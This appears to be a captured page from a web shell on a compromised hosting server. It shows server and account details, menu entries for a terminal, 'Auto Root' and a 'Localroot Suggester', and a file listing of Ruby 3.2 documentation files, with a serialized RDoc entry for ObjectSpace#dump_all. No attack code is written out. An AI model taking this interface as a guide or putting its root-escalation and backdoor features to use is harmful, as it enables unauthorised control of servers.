Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
ObjectSpace /
Delete
Unzip
Name
Size
Permission
Date
Action
InternalObjectWrapper
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
WeakMap
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
allocation_class_path-c.ri
809
B
-rw-r--r--
2026-04-07 17:42
allocation_generation-c.ri
871
B
-rw-r--r--
2026-04-07 17:42
allocation_method_id-c.ri
862
B
-rw-r--r--
2026-04-07 17:42
allocation_sourcefile-c.ri
533
B
-rw-r--r--
2026-04-07 17:42
allocation_sourceline-c.ri
545
B
-rw-r--r--
2026-04-07 17:42
cdesc-ObjectSpace.ri
3.16
KB
-rw-r--r--
2026-04-07 17:42
count_imemo_objects-c.ri
1.13
KB
-rw-r--r--
2026-04-07 17:42
count_nodes-c.ri
1020
B
-rw-r--r--
2026-04-07 17:42
count_objects-c.ri
1.28
KB
-rw-r--r--
2026-04-07 17:42
count_objects_size-c.ri
1.09
KB
-rw-r--r--
2026-04-07 17:42
count_symbols-c.ri
1.33
KB
-rw-r--r--
2026-04-07 17:42
count_tdata_objects-c.ri
1.54
KB
-rw-r--r--
2026-04-07 17:42
define_finalizer-c.ri
2.49
KB
-rw-r--r--
2026-04-07 17:42
dump-i.ri
834
B
-rw-r--r--
2026-04-07 17:42
dump_all-i.ri
2.3
KB
-rw-r--r--
2026-04-07 17:42
dump_shapes-i.ri
1.2
KB
-rw-r--r--
2026-04-07 17:42
each_object-c.ri
1.5
KB
-rw-r--r--
2026-04-07 17:42
garbage_collect-c.ri
309
B
-rw-r--r--
2026-04-07 17:42
garbage_collect-i.ri
308
B
-rw-r--r--
2026-04-07 17:42
internal_class_of-c.ri
679
B
-rw-r--r--
2026-04-07 17:42
internal_super_of-c.ri
703
B
-rw-r--r--
2026-04-07 17:42
memsize_of-c.ri
761
B
-rw-r--r--
2026-04-07 17:42
memsize_of_all-c.ri
1.21
KB
-rw-r--r--
2026-04-07 17:42
reachable_objects_from-c.ri
1.99
KB
-rw-r--r--
2026-04-07 17:42
reachable_objects_from_root-c.ri
535
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations-c.ri
1.13
KB
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_clear-c.ri
413
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_debug_start-c.ri
315
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_start-c.ri
412
B
-rw-r--r--
2026-04-07 17:42
trace_object_allocations_stop-c.ri
598
B
-rw-r--r--
2026-04-07 17:42
undefine_finalizer-c.ri
374
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI" dump_all:ETI"ObjectSpace#dump_all;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"0Dump the contents of the ruby heap as JSON.;To:RDoc::Markup::BlankLine o; ; [I"c_full_ must be a boolean. If true all heap slots are dumped including the empty ones (T_NONE).;T@o; ; [I"5_since_ must be a non-negative integer or +nil+.;T@o; ; [ I"KIf _since_ is a positive integer, only objects of that generation and ;TI"Pnewer generations are dumped. The current generation can be accessed using ;TI"VGC::count. Objects that were allocated without object allocation tracing enabled ;TI"Jare ignored. See ::trace_object_allocations for more information and ;TI"examples.;T@o; ; [I"?If _since_ is omitted or is +nil+, all objects are dumped.;T@o; ; [I":_shapes_ must be a boolean or a non-negative integer.;T@o; ; [I"LIf _shapes_ is a positive integer, only shapes newer than the provided ;TI"jshape id are dumped. The current shape_id can be accessed using <tt>RubyVM.stat(:next_shape_id)</tt>.;T@o; ; [I"2If _shapes_ is +false+, no shapes are dumped.;T@o; ; [I"^To only dump objects allocated past a certain point you can combine _since_ and _shapes_:;To:RDoc::Markup::Verbatim; [I"*ObjectSpace.trace_object_allocations ;TI"GC.start ;TI"gc_generation = GC.count ;TI"4shape_generation = RubyVM.stat(:next_shape_id) ;TI"call_method_to_instrument ;TI"JObjectSpace.dump_all(since: gc_generation, shapes: shape_generation) ;T:@format0o; ; [ I"7This method is only expected to work with C Ruby. ;TI">This is an experimental method and is subject to change. ;TI"AIn particular, the function signature and output format are ;TI"@not guaranteed to be compatible in future versions of ruby.;T: @fileI"!ext/objspace/lib/objspace.rb;T:0@omit_headings_from_table_of_contents_below0I"YObjectSpace.dump_all([output: :file]) -> #<File:/tmp/rubyheap20131125-88469-laoj3v.json> ObjectSpace.dump_all(output: :stdout) -> nil ObjectSpace.dump_all(output: :string) -> "{...}\n{...}\n..." ObjectSpace.dump_all(output: File.open('heap.json','w')) -> #<File:heap.json> ObjectSpace.dump_all(output: :string, since: 42) -> "{...}\n{...}\n..." ;T0[ I";(output: :file, full: false, since: nil, shapes: true);T@:FI"ObjectSpace;TcRDoc::NormalModule00